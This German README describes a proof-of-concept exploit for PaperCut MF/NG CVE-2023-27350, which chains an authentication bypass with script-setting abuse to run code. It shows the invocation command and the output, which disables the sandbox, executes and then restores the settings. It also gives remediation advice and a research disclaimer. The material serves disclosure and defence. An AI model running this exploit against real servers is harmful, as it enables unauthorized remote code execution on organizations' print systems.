
Proof-of-Concept-Exploit für PaperCut CVE-2023-27350
POC für CVE-2023-27350, der PaperCut MF/NG betrifft
Eine technische Ursachenanalyse der Sicherheitslücke, Kompromittierungsindikatoren und die Internet-Exposition finden Sie in unserem Blog: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Dieser POC nutzt eine Authentifizierungsumgehungslücke in Kombination mit dem Missbrauch der integrierten Skriptfunktionalität, um Code auszuführen.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Abhilfemaßnahmen, indem Sie den Anweisungen im PaperCut-Sicherheitshinweis folgen.
Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Nutzen Sie sie verantwortungsvoll.